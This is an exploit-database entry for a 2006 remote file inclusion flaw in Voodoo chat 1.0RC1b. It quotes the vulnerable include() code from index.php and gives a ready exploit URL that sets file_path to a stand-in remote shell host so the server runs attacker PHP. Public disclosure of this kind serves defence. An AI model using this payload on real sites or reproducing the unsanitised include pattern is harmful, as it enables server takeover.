header-logo
Suggest Exploit
vendor:
Voodoo chat
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: Voodoo chat
Affected Version From: 1.0RC1b
Affected Version To: 1.0RC1b
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Voodoo chat 1.0RC1b <= (file_path) Remote File Inclusion Exploit

Voodoo chat 1.0RC1b is vulnerable to a remote file inclusion vulnerability due to a failure to properly sanitize user-supplied input to the 'file_path' parameter in the 'index.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by sending a malicious URL to a legitimate user of the application.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in the application.
Source

Exploit-DB raw data:

#=================================================================
#Voodoo chat 1.0RC1b <= (file_path) Remote File Inclusion Exploit
#================================================================
#                                                                |
#Critical Level : Dangerous                                      |
#                                                                |
#Venedor site : http://vochat.com/                               |
#                                                                |
#Version : 1.0                                                   |
#                                                                |
#=================================================================
#Bug in : index.php
#
#Vlu Code :
#--------------------------------
#//here it can fails, i don't care. will be used default system language
#
#   else include_once($file_path."languages/".$language.".php");
#
#   include($file_path."designes/".$design."/index.php");
#?>
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/index.php?file_path=http://SHELLURL.COM?
#
#===============================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Bl@Ck^B1rd Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa  NANA Kashtawa
#Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer
=================================================================

# milw0rm.com [2006-08-01]